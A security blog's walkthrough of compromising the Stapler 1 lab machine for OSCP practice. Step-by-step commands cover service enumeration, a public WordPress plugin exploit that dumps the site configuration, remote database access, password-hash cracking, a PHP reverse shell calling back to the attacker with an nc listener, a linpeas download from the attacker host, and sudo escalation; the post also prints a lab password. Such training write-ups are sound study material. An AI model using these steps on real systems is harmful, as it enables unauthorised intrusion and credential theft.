<!doctype html><html lang=en>
<head>
<meta charset=utf-8>
<meta name=viewport content="width=device-width,initial-scale=1">
<meta http-equiv=content-language content="en">
<meta name=color-scheme content="light dark">
<meta http-equiv=content-security-policy content="upgrade-insecure-requests; block-all-mixed-content; default-src 'self'; child-src 'self'; font-src 'self' https://fonts.gstatic.com https://cdn.jsdelivr.net/; form-action 'self'; frame-src 'self'; img-src 'self'; object-src 'none'; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com/ https://cdn.jsdelivr.net/; script-src 'self' 'unsafe-inline' https://www.google-analytics.com; prefetch-src 'self'; connect-src 'self' https://www.google-analytics.com;">
<meta name=author content="Kiel Vaughn">
<meta name=description content="Stapler 1 is a vulnerable machine found on the NetSecFocus Trophy Room list which I have been using as preparation for the OSCP. Below is a walkthrough to compromise this machine.
First, after downloading and importing the machine into VMware, I had to figure out the IP address of the machine. I used netdiscover -i eth0 until I came across the IP of this machine.
Next, I ran threader3000 to enumerate the open ports and let it run it&rsquo;s recommended nmap scan.">
<meta name=keywords content="blog,cybersecurity,personal">
<meta name=twitter:card content="summary">
<meta name=twitter:title content="Stapler 1">
<meta name=twitter:description content="Stapler 1 is a vulnerable machine found on the NetSecFocus Trophy Room list which I have been using as preparation for the OSCP. Below is a walkthrough to compromise this machine.
First, after downloading and importing the machine into VMware, I had to figure out the IP address of the machine. I used netdiscover -i eth0 until I came across the IP of this machine.
Next, I ran threader3000 to enumerate the open ports and let it run it&rsquo;s recommended nmap scan.">
<meta property="og:title" content="Stapler 1">
<meta property="og:description" content="Stapler 1 is a vulnerable machine found on the NetSecFocus Trophy Room list which I have been using as preparation for the OSCP. Below is a walkthrough to compromise this machine.
First, after downloading and importing the machine into VMware, I had to figure out the IP address of the machine. I used netdiscover -i eth0 until I came across the IP of this machine.
Next, I ran threader3000 to enumerate the open ports and let it run it&rsquo;s recommended nmap scan.">
<meta property="og:type" content="article">
<meta property="og:url" content="http://www.kielvaughn.com/ctfs/2020-08-15-stapler/"><meta property="article:section" content="ctfs">
<meta property="article:published_time" content="2020-08-15T00:00:00+00:00">
<meta property="article:modified_time" content="2020-08-15T00:00:00+00:00">
<title>
Stapler 1 · Kiel Vaughn, CISSP
</title>
<link rel=canonical href=http://www.kielvaughn.com/ctfs/2020-08-15-stapler/>
<link rel=preload href="/fonts/forkawesome-webfont.woff2?v=1.2.0" as=font type=font/woff2 crossorigin>
<link rel=stylesheet href=/css/coder.min.708686f8ab8176e91d44fcbe488a0fe0333b94f405cf18a52383d67ba22f0ccb.css integrity="sha256-cIaG+KuBdukdRPy+SIoP4DM7lPQFzxilI4PWe6IvDMs=" crossorigin=anonymous media=screen>
<link rel=stylesheet href=/css/coder-dark.min.aa883b9ce35a8ff4a2a5008619005175e842bb18a8a9f9cc2bbcf44dab2d91fa.css integrity="sha256-qog7nONaj/SipQCGGQBRdehCuxioqfnMK7z0Tastkfo=" crossorigin=anonymous media=screen>
<link rel=icon type=image/png href=/assets/img/cissp.ico sizes=32x32>
<link rel=icon type=image/png href=/assets/img/cissp.ico sizes=16x16>
<link rel=apple-touch-icon href=/assets/img/cissp.ico>
<link rel=apple-touch-icon sizes=180x180 href=/assets/img/cissp.ico>
<meta name=generator content="Hugo 0.88.1">
</head>
<body class="preload-transitions colorscheme-dark">
<main class=wrapper>
<nav class=navigation>
<section class=container>
<a class=navigation-title href=/>
Kiel Vaughn, CISSP
</a>
<input type=checkbox id=menu-toggle>
<label class="menu-button float-right" for=menu-toggle>
<i class="fa fa-bars fa-fw" aria-hidden=true></i>
</label>
<ul class=navigation-list>
<li class=navigation-item>
<a class=navigation-link href=/whoami/>whoami</a>
</li>
<li class=navigation-item>
<a class=navigation-link href=/certifications/>certifications</a>
</li>
<li class=navigation-item>
<a class=navigation-link href=/posts/>blog</a>
</li>
<li class=navigation-item>
<a class=navigation-link href=/ctfs/>vulnerable machine walkthroughs</a>
</li>
</ul>
</section>
</nav>
<div class=content>
<section class="container page">
<article>
<header>
<h1 class=title>
<a class=title-link href=http://www.kielvaughn.com/ctfs/2020-08-15-stapler/>
Stapler 1
</a>
</h1>
</header>
<p><a href=https://www.vulnhub.com/entry/stapler-1,150/>Stapler 1</a> is a vulnerable machine found on the <a href="https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0">NetSecFocus Trophy Room</a> list which I have been using as preparation for the OSCP. Below is a walkthrough to compromise this machine.</p>
<p>First, after downloading and importing the machine into VMware, I had to figure out the IP address of the machine. I used <strong>netdiscover -i eth0</strong> until I came across the IP of this machine.</p>
<p><img src=/assets/img/Stapler1.png alt="Stapler 1 netdiscover"></p>
<p>Next, I ran <strong>threader3000</strong> to enumerate the open ports and let it run it&rsquo;s recommended nmap scan.</p>
<p><img src=/assets/img/Stapler2.png alt="Stapler 1 threader3000"></p>
<p><img src=/assets/img/Stapler3.png alt="Stapler 1 nmap1"></p>
<p><img src=/assets/img/Stapler4.png alt="Stapler 1 nmap2"></p>
<p>It appeared that FTP access was open to the anonymous user, so I connected with <strong>ftp [machine ip]</strong> and entered the user of <strong>anonymous</strong> and a blank password. Once connected, I ran <strong>ls</strong> to list the directory contents, which had a note file present. I ran <strong>get note</strong> to download this note file locally.</p>
<p><img src=/assets/img/Stapler5.png alt="Stapler 1 ftp"></p>
<p>Next, I reviewed the note&rsquo;s content with <strong>cat note</strong>.</p>
<p><img src=/assets/img/Stapler6.png alt="Stapler 1 cat note"></p>
<p>Next, I ran <strong>nmap &ndash;script smb-enum-shares -p 139 [machine ip]</strong> to enumerate the SMB shares.</p>
<p><img src=/assets/img/Stapler7.png alt="Stapler 1 nmap enumerate smb shares"></p>
<p>It appears that the anonymous user has read access to <strong>\kathy</strong> and read/write access to <strong>\tmp</strong>. I ran <strong>smbclient \\\\[machine ip]\\kathy -U &ldquo;"</strong> to connect to kathy&rsquo;s share. I then ran <strong>ls</strong>, which showed directories of <strong>kathy_stuff</strong> and <strong>backup</strong>. I then ran <strong>cd kathy_stuff</strong> followed by <strong>ls</strong> and saw that there is a file named <strong>todo-list.txt</strong> present. I ran **mget *** to download this file. I then ran <strong>cd ..</strong> followed by <strong>cd backup</strong> and another <strong>ls</strong>. This showed two files present, <strong>vsftpd.conf</strong> and <strong>wordpress-4.tar.gz</strong>. I then ran **mget *** to download these files as well.</p>
<p><img src=/assets/img/Stapler8.png alt="Stapler 1 smbclient \kathy"></p>
<p>None of these files had anything important in them, as the ftp/WordPress files were default files, and the todo-list.txt didn&rsquo;t really have anything useful in it either. Next, I looked at the webpage on port 80, which had nothing present on it, I then looked at the website hosted on <strong>port 12380</strong>, which had a coming soon page present. I decided to run <strong>nikto -host http://[machine ip]:12380</strong> to enumerate this host. It found that the site uses SSL and two entries in the robots.txt file on the HTTPS site: <strong>/admin112233/</strong> and <strong>/blogblog/</strong>.</p>
<p><img src=/assets/img/Stapler9.png alt="Stapler 1 nikto"></p>
<p>Looking at the <strong>/admin112233</strong> directory redirected to another website mentioning XSS so I made note of that in case it was a hint needed for later. Next, I navigated to <strong>https://[machine ip]:12380/blogblog/</strong> and it appeared to be a WordPress blog.</p>
<p><img src=/assets/img/Stapler10.png alt="Stapler 1 WordPress site"></p>
<p>Next I ran <strong>wpscan &ndash;url https://[machine ip]:12380/blogblog &ndash;disable-tls-checks</strong>. This uncovered the fact that the uploads directory lists its contents.</p>
<p><img src=/assets/img/Stapler11.png alt="Stapler 1 wpscan 1"></p>
<p><img src=/assets/img/Stapler12.png alt="Stapler 1 wpscan 2"></p>
<p>Let&rsquo;s go to <strong>https://[machine ip]:12380/blogblog/wp-content/uploads</strong>. It appears that nothing is in this directory, but we can go up to its parent directory.</p>
<p><img src=/assets/img/Stapler13.png alt="Stapler 1 /blogblog/wp-content/uploads"></p>
<p>Navigating up a directory reveals a plugins directory, let&rsquo;s see what is in there.</p>
<p><img src=/assets/img/Stapler14.png alt="Stapler 1 plugins directory"></p>
<p>It appears that there are several plugins here. Let&rsquo;s take a look at the <strong>advanced-vdieo-embed-embed-videos-or-playlists</strong> directory.</p>
<p><img src=/assets/img/Stapler15.png alt="Stapler 1 plugin directory"></p>
<p>From here, let&rsquo;s look at the <strong>readme.txt</strong> file.</p>
<p><img src=/assets/img/Stapler16.png alt="Stapler 1 readme.txt"></p>
<p>It appears that this is version 1.0 of this plugin, which has an exploit available. A quick Google search reveals exploit ID <strong>39646</strong>.</p>
<p><img src=/assets/img/Stapler17.png alt="Stapler 1 exploit-db 39646"></p>
<p>From your attacker PC, run <strong>searchsploit 39646</strong>, which should return the results shown below.</p>
<p><img src=/assets/img/Stapler18.png alt="Stapler 1 searchsploit"></p>
<p>Let&rsquo;s run <strong>searchsploit - m 39646</strong> to copy this exploit to our current directory.</p>
<p><img src=/assets/img/Stapler19.png alt="Stapler 1 searchsploit -m"></p>
<p>I then opened the exploit it an editor and modified the <strong>url</strong> variable to point to <strong>&ldquo;https://[machine ip]:12380/blogblog&rdquo;</strong> and saved the exploit.</p>
<p><img src=/assets/img/Stapler20.png alt="Stapler 1 modify 39646 exploit"></p>
<p><img src=/assets/img/Stapler21.png alt="Stapler 1 exploit failed"></p>
<p>The exploit seems to have failed because it could not verify the certificate. I decided to review the code of the exploit again.</p>
<p><img src=/assets/img/Stapler22.png alt="Stapler 1 exploit code"></p>
<p>This is where I found the highlighted section above. I modified it by replacing the <strong>' +str(randomID) + &lsquo;</strong> portion with several 7s (I don&rsquo;t think the value matters) and then copied this URL string (as shown below). This will save the wp-config.php file to a .jpeg file.</p>
<p><img src=/assets/img/Stapler23.png alt="Stapler 1 exploit URL"></p>
<p>I then copied/pasted this value into my browser to run this exploit code.</p>
<p>![Stapler 1 new post](/assets/img/Stapler24.pn</p>
<p>After running it, I went to the main webpage of the website as directed by the exploit. It created a post named <strong>7777777</strong> (which is the title we modified in the exploit above). It also created an image named <strong>[random number].jpg</strong>)</p>
<p><img src=/assets/img/Stapler25.png alt="Stapler 1 /blogblog/wp-content/uploads"></p>
<p>I navigated to <strong>/blogblog/wp-content/uploads</strong> and the jpeg file was present there. I saved it locally as <strong>[file name].txt</strong>.</p>
<p><img src=/assets/img/Stapler26.png alt="Stapler 1 save jpeg"></p>
<p>I then opened the file with Mousepad on my attacker PC</p>
<p><img src=/assets/img/Stapler27.png alt="Stapler 1 wp-config.php 1"></p>
<p><img src=/assets/img/Stapler28.png alt="Stapler 1 wp-config.php 2"></p>
<p>Scrolling through the config led us to the login credentials for MySQL. This port was also accessible externally based on the nmap scan earlier. Let&rsquo;s run <strong>mysql -u root -h [machine ip] -p</strong> and enter the password above when prompted.</p>
<p><img src=/assets/img/Stapler29.png alt="Stapler 1 remote mysql login"></p>
<p>Let&rsquo;s run <strong>show databases;</strong> to list the databases on the server and then use <strong>use wordpress;</strong> to select the WordPress table. Next, let&rsquo;s run <strong>show tables;</strong> to list the tables in the database.</p>
<p><img src=/assets/img/Stapler30.png alt="Stapler 1 enumerate mysql 1"></p>
<p>Let&rsquo;s next run <strong>select * from wp_users;</strong> and you will get a huge list of users/password hashes as shown below.</p>
<p><img src=/assets/img/Stapler31.png alt="Stapler 1 enumerate mysql 2"></p>
<p>Let&rsquo;s slightly modify our query to <strong>select user_login,user_pass from wp_users;</strong> to only get the usernames and password hashes.</p>
<p><img src=/assets/img/Stapler32.png alt="Stapler 1 mysql wp_user modified query"></p>
<p>Next, let&rsquo;s copy this and save the hashes only to a text file on your attacker pc. I saved it as <strong>wphashes.txt</strong>.</p>
<p><img src=/assets/img/Stapler33.png alt="Stapler 1 wordpress hashes"></p>
<p>Let&rsquo;s run hashcat to crack these hashes with <strong>hashcat -m 4000 -a 0 wphashes.txt /usr/share/wordlists/rockyou.txt</strong>.</p>
<p><img src=/assets/img/Stapler34.png alt="Stapler 1 hashcat"></p>
<p>After a bit, it cracked a few of the passwords.</p>
<p><img src=/assets/img/Stapler35.png alt="Stapler 1 hashcat results"></p>
<p>I lined these hashes/passwords up with the list we had copied over originally and was able to login as 4 different users, but none of them were an administrator. I then remembered that usually the first user listed was the admin, so I modified wp-hashes.txt to only have that hash present and reran <strong>hashcat -m 4000 -a 0 wphashes.txt /usr/share/wordlists/rockyou.txt</strong>. After a few minutes, it cracked this user&rsquo;s (john) password.</p>
<p><img src=/assets/img/Stapler36.png alt="Stapler 1 hashcat john password crack"></p>
<p>Below are a list of the users and passwords that were cracked. I tried to SSH into the target machine with all of these usernames/passwords, but none were successful.</p>
<p><img src=/assets/img/Stapler37.png alt="Stapler 1 wordpress users/passwords"></p>
<p>I then logged in with John&rsquo;s credentials for WordPress, and he is an administrator. I clicked on <strong>Plugins, Add New</strong> and then <strong>Browse</strong> so I could upload a <a href=http://pentestmonkey.net/tools/web-shells/php-reverse-shell>reverse PHP shell</a>. I modified this shell to point to my attacker PC&rsquo;s IP address and a port of my choosing (4444). Once modified, I saved it and uploaded it.</p>
<p><img src=/assets/img/Stapler38.png alt="Stapler 1 Wordpress Plugins"></p>
<p>The screen below came up after uploading the PHP shell. I ignored this as we do not need to configure anything.</p>
<p><img src=/assets/img/Stapler39.png alt="Stapler 1 upload complete"></p>
<p>From my attacker PC, I started a nc listener with <strong>nc -nvlp 4444</strong> (as this was the port I had specified in the reverse shell to connect on).</p>
<p><img src=/assets/img/Stapler40.png alt="Stapler 1 nc listener"></p>
<p>I knew that files typically got uploaded to <strong>/wp-content/uploads</strong> under the base WordPress site URL, so I navigated there. We could see a directory listing, which had the reverse shell we just uploaded. I clicked on this file to execute the reverse shell.</p>
<p><img src=/assets/img/Stapler41.png alt="Stapler 1 /blogblog/wp-content/uploads"></p>
<p>At this point we finally had a foothold. Running <strong>whoami</strong> revealed we have access as user <strong>www-data</strong></p>
<p><img src=/assets/img/Stapler42.png alt="Stapler 1 foothold www-data"></p>
<p>Next, I upgraded my shell with <strong>python -c &lsquo;import pty; pty.spawn("/bin/sh&rdquo;)'</strong>.</p>
<p><img src=/assets/img/Stapler43.png alt="Stapler 1 upgrade shell Python"></p>
<p>Next, I served up a python http server on my attacker PC with <strong>python3 -m http.server</strong> so we could retrieve linpeas.sh to enumerate this box further. From the initial foothold, I ran <strong>cd /tmp</strong> followed by <strong>wget http://[attacker ip]:8000/linpeas.sh</strong> and then made it executable with <strong>chmod +x linpeas.sh</strong>.</p>
<p><img src=/assets/img/Stapler44.png alt="Stapler 1 cd /tmp wget linpeas.sh"></p>
<p>I then ran linpeas.sh with <strong>./linpeas.sh</strong> and reviewed the results.</p>
<p><img src=/assets/img/Stapler45.png alt="Stapler 1 linepeas.sh 1"></p>
<p><img src=/assets/img/Stapler46.png alt="Stapler 1 linepeas.sh 2"></p>
<p><img src=/assets/img/Stapler47.png alt="Stapler 1 linepeas.sh 3"></p>
<p>The Linux kernel seemed exploitable based on linpeas, and a quick look at searchsploit confirmed several potential exploits that could work. However, before digging into each of those, I noticed that <strong>peter</strong> was a member of the <strong>sudo</strong> group and JKanode&rsquo;s <strong>.bash_history</strong> file had an ssh password present. I ran <strong>su peter</strong> and entered the password found above (<strong>JZQuyIN5</strong>) and now I had access as peter. I was then prompted with setting up Z Shell, so I selected options <strong>1</strong> followed by <strong>0</strong> to complete setup.</p>
<p><img src=/assets/img/Stapler48.png alt="Stapler 1 su peter z shell 1"></p>
<p><img src=/assets/img/Stapler49.png alt="Stapler 1 su peter z shell 2"></p>
<p>Next, I ran <strong>sudo -l</strong> and it appears that peter can run anything as root.</p>
<p><img src=/assets/img/Stapler50.png alt="Stapler 1 sudo -l"></p>
<p>I then ran <strong>sudo su</strong> followed by <strong>whoami</strong> to confirm I had root access. Next, I ran <strong>cd /root</strong> followed by <strong>ls</strong> and there is a <strong>flag.txt</strong> file present. I ran <strong>cat flag.txt</strong> to get the root flag and finish this box.</p>
<p><img src=/assets/img/Stapler51.png alt="Stapler 1 sudo su root access"></p>
</article>
</section>
</div>
<footer class=footer>
<section class=container>
©
2020 -
2021
Kiel Vaughn
</section>
</footer>
</main>
<script src=/js/coder.min.03b17769f4f91ae35667e1f2a1ca8c16f50562576cf90ff32b3179926914daa5.js integrity="sha256-A7F3afT5GuNWZ+HyocqMFvUFYlds+Q/zKzF5kmkU2qU="></script>
</body>
</html>